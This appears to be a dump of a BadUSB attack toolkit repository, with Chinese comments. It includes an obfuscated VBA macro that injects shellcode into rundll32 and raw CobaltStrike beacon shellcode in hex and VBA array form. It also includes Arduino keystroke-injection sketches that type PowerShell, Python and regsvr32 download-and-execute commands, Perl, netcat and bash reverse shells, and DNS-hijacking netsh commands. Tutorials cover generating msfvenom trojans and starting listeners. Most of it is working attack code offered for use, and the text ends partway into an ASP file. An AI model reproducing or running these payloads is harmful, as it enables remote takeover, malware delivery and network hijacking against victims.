"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(41)&Chr(10)&"    If L"&"en"&Chr(40)&"Environ"&Chr(40)&Chr(34)&"ProgramW"&"6432"&Chr(34)&Chr(41)&Chr(41)&" "&Chr(62)&" 0 Then"&Chr(10)&"        "&"sProc "&Chr(61)&" Environ"& _
Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"SysWOW64"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&"    Else"&Chr(10)&"        "&"sProc "&Chr(61)&" Environ"& _
Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"System32"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&"    End "&"If"&Chr(10)&Chr(10)&"    res "&Chr(61)&" RunStuf"& _
"f"&Chr(40)&"sNull"&Chr(44)&" sProc"&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 1"&Chr(38)&Chr(44)&" ByVal 4"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" sNull"&Chr(44)&" sInfo"& _
Chr(44)&" pInfo"&Chr(41)&Chr(10)&Chr(10)&"    rwxp"&"age "&Chr(61)&" AllocSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" UBound"&Chr(40)&"myArray"&Chr(41)&Chr(44)&" "&Chr(38)&"H1000"& _
Chr(44)&" "&Chr(38)&"H40"&Chr(41)&Chr(10)&"    For "&"offset "&Chr(61)&" LBound"&Chr(40)&"myArray"&Chr(41)&" To UBou"&"nd"&Chr(40)&"myArray"&Chr(41)&Chr(10)&"        "&"myByte "&Chr(61)&" myArray"&Chr(40)& _
"offset"&Chr(41)&Chr(10)&"        "&"res "&Chr(61)&" WriteSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" rwxpage"&" "&Chr(43)&" offset"&Chr(44)&" myByte"&Chr(44)&" 1"&Chr(44)&" ByVal 0"&Chr(38)& _
Chr(41)&Chr(10)&"    Next"&" offset"&Chr(10)&"    res "&Chr(61)&" CreateS"&"tuff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" 0"&Chr(44)&" rwxpage"&Chr(44)&" 0"&Chr(44)&" 0"&Chr(44)&" 0"& _
Chr(41)&Chr(10)&"End Sub"&Chr(10)&"Sub Auto"&"Open"&Chr(40)&Chr(41)&Chr(10)&"    Auto"&"_Open"&Chr(10)&"End Sub"&Chr(10)&"Sub Work"&"book_Ope"&"n"&Chr(40)&Chr(41)&Chr(10)&"    Auto"&"_Open"&Chr(10)&"End Sub"& _
Chr(10)
objExcel.DisplayAlerts = False
on error resume next
objExcel.Run "Auto_Open"
objWorkbook.Close False
objExcel.Quit

' Restore the registry to its old state
if action = "" then
	WshShell.RegDelete RegPath
else
	WshShell.RegWrite RegPath, action, "REG_DWORD"
end if
		]]>
		</script>
	</registration>
</scriptlet>

================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt
================================================
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x70\x44\x42\x66\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00

================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba
================================================
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,36,5,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,96,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,86,110,82,70,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _
105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _
105,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _
105,100,101,110,116,47,54,46,48,41,13,10,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,49,53,52,46,49,51,49,0,0,0,0,0)

================================================
FILE: CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.154.131:80/c'))\"");  //访问Web Delivery-psl，恶意网址按照实际更改
  delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("python -c \"import urllib2; exec urllib2.urlopen('http://192.168.154.131:80/d').read();\"");  //访问Web Delivery-py，恶意网址按照实际更改
  delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"IP:port");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};");  //访问Web Delivery-Perl，恶意网址按照实际更改
  delay(200); 
  //Keyboard.println("./hacked.pl");
  //delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("regsvr32 /s /n /u /i:http://192.168.154.131:80/e scrobj.dll");  //访问Web Delivery-regsvr32，恶意网址按照实际更改
  delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: CodePrincipleInterpretation/ArduinoKeyCodeBase.ino
================================================
//基础按键
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI //win键
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN//回车键
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12

delay(5000);//延时毫秒

Keyboard.begin(); //开始键盘通讯
Keyboard.end(); //结束键盘通讯
Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来
Keyboard.release(); //释放键盘按键
Keyboard.println(“”); //输入字符串使用双引号括起来

Mouse.begin();//鼠标事件开始
Mouse.click();//鼠标单击
Mouse.end();//鼠标事件结束
Mouse.move();//鼠标移动(x,y)
Mouse.press();//鼠标按下
Mouse.release();//鼠标松开
Mouse.isPressed();


================================================
FILE: CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt
================================================
ʲôsetup
   setup BadusbڲϺ״ִеĴ
   Badusbͨʹõľsetup
   ֻҪд
          void setup(){//д}

ʲôloop
   loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ

   ΪʲôBadusbһдsetup
ԭܼ
   㽫дloopлᵼԼҲ޷Ĵ룬ΪһĵԾͣ

ôµĴ޷д룬ǿд룬ҪĻñȽϸ

































================================================
FILE: CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt
================================================
msf木马制作

1、在攻击者终端操作：
msfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport=<Your Port> -f exe >/root/Desktop/evilshell.exe
-p 参数后跟上payload（攻击载荷）
lhost  后跟监听的IP
lport  后跟监听的端口
-f  后跟要生成后门文件的类型
-o  指定输出文件及类型
-i  混淆次数
-e  混淆模式
例如：exe木马：
      msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o virus.exe -e x86/shikata_ga_nai -i 8
	  
      jsp木马：
	  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.jsp
	  
	  #Powershell木马:
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > virus.psl
 
      #JAVA木马:
      msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o virus.jar
      
      #PHP木马:
      msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o virus.php
      
      #ASP木马:
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > virus.asp
      
      #ASPX木马:
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > virus.aspx
      
      #Python木马:
      msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > virus.py
      
      #Android木马:
      msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o virus.apk
      
      #Bash木马:
      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.sh
      
      #Linux木马：
      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf
      
      #Mac木马：
      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho
      
      #WAR木马：
      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war
      
      #Perl木马：
      msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl


2、开启postgresql数据库：（简单攻击可省略）
/etc/init.d/postgresql status  查看postgresql服务的状态
/etc/init.d/postgresql start  开启postgresql服务
netstat -ntulp  查看端口


3、启动msf监听，等待BadUSB插入，对方上线：
msfconsole  开启MSF
msf5>use exploit/multi/handler 选择exploits
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload，注意与上方payload相同
show options  查看所需设置的参数
set lhost KaliIP (设置监听地址，注意与上方lhost相同)
set lport <Your Port>  设置监听端口
run 或者exploit  运行攻击模块


================================================
FILE: DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino
================================================
void setup() {
  Keyboard.begin();//开始键盘通讯 
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd /c netsh interface ip set dns \"Local Area Connection\" static 127.0.0.1-192.168.1.1&&netsh interface ip set dns \"????\" static 127.0.0.1-192.168.1.1");  //DOS命令设置多个DNS
  Keyboard.end();
}
void loop() {
}


================================================
FILE: DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino
================================================
void setup(){
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS");
  Keyboard.println();
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  delay(500);
  Keyboard.println("CMD");
  delay(50);
  Keyboard.println("NETSH INTERFACE IP SET DNS \"lOCAL aREA cCONNECTION\" STATIC 127.0.0.1-192.168.1.1&&EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop(){
}


================================================
FILE: LICENSE
================================================
BSD 3-Clause License

Copyright (c) 2021, wwy
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino
================================================


void setup()
{
  delay(5000);
  terminal();
  delay(3000);
  Keyboard.println("echo INPUT0 > /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT1 >> /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT2 >> /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT3 >> /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT4 >> /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT5 >> /tmp/pay");
  delay(100);
  Keyboard.println("echo INPUT6 >> /tmp/pay");
  delay(2000);
  Keyboard.println("xxd -r -p /tmp/pay /tmp/payload");
  delay(2000);
  Keyboard.println("chmod +x /tmp/payload");
  Keyboard.println("/tmp/payload &");
  delay(2000);
  Keyboard.println("exit");
  
}

void loop()
{
   
}

void terminal()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_T);
  Keyboard.send_now();
  
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 

}


================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino
================================================

# define PAYLOAD1 "mknod bp1 p && nc INPUT0 INPUT1 0<bp1 | /bin/bash 1>bp1 &"
//# define PAYLOAD2 "/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &" 
#define PAYLOAD3 "mknod bp2 p && telnet INPUT2 INPUT3 0<bp2 | /bin/bash 1>bp2 &"

void setup()
{
  delay(5000);
  terminal();
  delay(3000);
  Keyboard.println(PAYLOAD1);
  delay(2000);
  //Keyboard.println(PAYLOAD2);
  //delay(2000);
  Keyboard.println(PAYLOAD3);
  delay(2000);
  Keyboard.println("exit");
  
}

void loop()
{
   
}

void terminal()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_T);
  Keyboard.send_now();
  
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 

}



================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino
================================================


void setup()
{
  delay(5000);
  terminal();
  delay(3000);
  Keyboard.print("perl -MIO -e '$p=fork;exit,if");
  delay(100);
  Keyboard.print("($p);$c=new IO::Socket::INET");
  delay(100);
  Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\"");
  delay(100);
  Keyboard.print(");STDIN->fdopen($c,r);$~->");
  delay(100);
  Keyboard.print("fdopen($c,w);system$_ ");
  delay(100);
  Keyboard.println("while<>;'");
  delay(1000);
  Keyboard.println("exit");
    
}

void loop()
{
   
}

void terminal()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_T);
  Keyboard.send_now();
  
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 

}



================================================
FILE: MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt
================================================

IP192.168.43.242
port4444


exeľ
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o shell.exe -e x86/shikata_ga_nai -i 8

jspľ
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.jsp

#Powershellľ:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > shell.psl

#JAVAľ:
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o shell.jar

#PHPľ:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o shell.php

#ASPľ:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > shell.asp

#ASPXľ:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > shell.aspx

#Pythonľ:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > shell.py

#Androidľ:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o shell.apk

#Bashľ:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.sh

#Linuxľ
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf

#Macľ
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho

#WARľ
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war

#Perlľ
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl


================================================
FILE: MSF_Trojanlinkage/shell.asp
================================================
<% @language="VBScript" %>
<% 
	Sub gJjCrDeBtLBn()
